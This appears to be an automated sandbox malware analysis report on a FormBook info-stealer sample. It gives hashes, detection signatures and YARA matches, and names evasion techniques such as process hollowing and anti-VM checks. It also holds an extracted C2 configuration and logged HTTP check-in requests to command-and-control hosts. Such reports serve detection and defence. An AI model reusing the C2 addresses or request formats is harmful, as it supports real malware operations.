Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Sample Name:	cK1g5gckZR9VHjj.exe
Analysis ID:	528618
MD5:	5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1:	25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256:	afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Tags:	exeFormbookxloader
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Uses netsh to modify the Windows network and firewall settings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Self deletion via cmd delete

.NET source code contains potential unpacker

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara detected FormBook

Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: cK1g5gckZR9VHjj.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: cK1g5gckZR9VHjj.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source:	Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 4x nop then pop edi	2_2_00415660
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 4x nop then pop esi	2_2_004157D8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 4x nop then pop esi	2_2_004157AA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	12_2_02DD5660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop esi	12_2_02DD57D8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop esi	12_2_02DD57AA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 142.252.22.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.94.210.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dragonmodz.net
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe	Domain query: www.qzttb.net
Source: C:\Windows\explorer.exe	Domain query: www.royaldears.com
Source: C:\Windows\explorer.exe	Domain query: www.pittsburghdata.center
Source: C:\Windows\explorer.exe	Network Connect: 209.17.116.163 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.spoiledzone.com/udeh/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 3.64.163.50 3.64.163.50

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: PHP/7.0.33X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 14:11:35 GMTConnection: closeContent-Length: 7447Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20

Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.qzttb.net

Source: global traffic	HTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: cK1g5gckZR9VHjj.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
